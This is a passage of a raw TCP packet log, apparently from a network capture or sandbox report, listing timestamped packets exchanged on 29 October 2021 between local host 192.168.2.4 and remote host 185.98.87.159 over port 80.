Oct 29, 2021 20:50:19.756217957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756237030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756257057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756258965 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756278038 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756287098 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756299973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756320000 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756320000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756341934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756362915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756382942 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756385088 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756402969 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756406069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756427050 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756442070 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756448030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756469965 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756489992 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756509066 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756513119 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756535053 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756544113 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756568909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756589890 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756608963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756614923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756629944 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756632090 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756650925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756671906 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756692886 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756692886 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756714106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756717920 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756733894 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756753922 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756757021 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756773949 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756794930 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756803036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756824017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756844997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756885052 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756894112 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756908894 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756920099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756942987 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756963015 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756983042 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757004023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757004023 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757025957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757030964 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757045984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757056952 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757067919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757083893 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757088900 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757111073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757131100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757133961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757179022 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757195950 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757211924 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757225990 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757232904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757255077 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757266045 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757277966 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757292032 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757301092 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757320881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757323027 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757342100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757364988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757384062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757386923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757406950 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757411957 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757428885 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757447958 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757468939 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757474899 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757489920 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757493019 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757510900 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757531881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.757558107 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.757577896 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.764947891 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.765125990 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801043987 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801115990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801173925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801211119 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801230907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801290989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801321983 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801348925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801394939 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801409006 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801470041 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801532030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801593065 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801594973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801651001 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801655054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801713943 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801774979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801835060 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801835060 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801892996 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.801896095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.801956892 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802018881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802074909 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802078962 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802131891 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802139044 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802201033 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802239895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802280903 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802283049 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802320004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802321911 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802361012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802403927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802444935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802448034 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802484035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802485943 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802527905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802570105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802608967 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802622080 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802650928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802670002 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802704096 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802743912 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802788019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802793026 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802829981 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802834988 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802870035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802912951 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802952051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.802956104 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.802994013 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.803735971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.803785086 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.803827047 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.803868055 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.803889036 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.803910017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.803921938 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.803956032 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.803996086 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804037094 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804060936 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.804080963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804105043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.804121971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804163933 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804203987 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804212093 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.804248095 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.804248095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804292917 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804331064 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.804380894 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.807431936 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807482958 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807523012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807563066 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807568073 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.807590961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.807602882 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807642937 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807684898 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.807841063 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807884932 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807890892 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.807925940 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.807965994 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808008909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808013916 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808048964 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808054924 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808089018 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808130980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808171034 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808182001 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808213949 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808218956 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808254957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808294058 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808332920 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808337927 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808372021 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808372974 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808413982 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808454990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808492899 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.808511972 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808533907 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.808533907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.809334993 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.809381962 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.809422016 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.809443951 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.809549093 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.809875965 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.809919119 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.809956074 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.809973001 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.809995890 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810029030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810065031 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810071945 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.810107946 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.810261965 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810301065 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810336113 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810372114 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810381889 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.810406923 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810414076 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.810444117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810647964 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810684919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810703993 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.810722113 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810733080 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.810864925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810899973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810929060 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810957909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.810993910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811002970 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811032057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811052084 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811069012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811108112 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811110973 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811142921 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811178923 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811214924 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811224937 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811250925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811260939 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811288118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811322927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811361074 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811372042 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811398029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811399937 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811431885 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811466932 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811469078 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811502934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811537027 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811573029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811589956 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811610937 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811635017 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811664104 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811693907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811721087 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811731100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811769009 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811780930 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811804056 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811840057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811856985 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811878920 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811913013 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811949968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.811975002 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.811988115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812000990 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812025070 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812062025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812093019 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812097073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812133074 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812169075 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812189102 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812191963 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812211037 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812216997 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812232018 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812259912 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812261105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812287092 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812308073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812314987 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812331915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812350988 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812351942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812374115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812393904 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812396049 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812417984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812439919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812460899 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812469006 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812483072 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812500954 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812508106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812522888 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812529087 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812549114 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812566042 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812567949 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812589884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812611103 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812611103 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812632084 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812650919 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812653065 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812683105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812705040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812725067 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812727928 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812747002 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812764883 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812769890 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812788963 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812793016 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812813997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812835932 CEST	80	49855	185.98.87.159	192.168.2.4
